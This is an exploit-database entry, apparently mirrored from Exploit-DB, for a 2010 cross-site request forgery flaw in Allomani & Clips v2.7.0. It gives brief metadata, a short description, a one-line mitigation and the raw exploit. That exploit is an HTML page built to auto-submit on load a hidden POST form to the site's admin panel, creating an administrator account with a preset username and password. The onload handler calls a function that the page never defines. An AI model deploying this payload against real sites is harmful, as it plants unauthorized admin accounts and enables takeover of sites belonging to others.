header-logo
Suggest Exploit
vendor:
Clips
by:
G0D-F4Th3rG0D-F4Th3r
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Clips
Affected Version From: 2.7.0
Affected Version To: 2.7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:allomani:clips:2.7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Allomani & Clips v2.7.0 – [CSRF] Add Admin Account

A CSRF vulnerability exists in Allomani & Clips v2.7.0 which allows an attacker to add an admin account by sending a malicious POST request. The request contains the username, password, email, group_id and useraddbutton parameters.

Mitigation:

Implementing a CSRF token in the request can prevent this attack.
Source

Exploit-DB raw data:

# Exploit Title: Allomani & Clips v2.7.0 - [CSRF] Add Admin Account
# Date:25 -06-2010
# Author: G0D-F4Th3rG0D-F4Th3r
# Software Link: http://allomani.com


####################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="admin2"/>
<input type="hidden" name="password" value="admin2123"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="?????"/>
</form>
</body>
</html>

#########################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
#########################################################################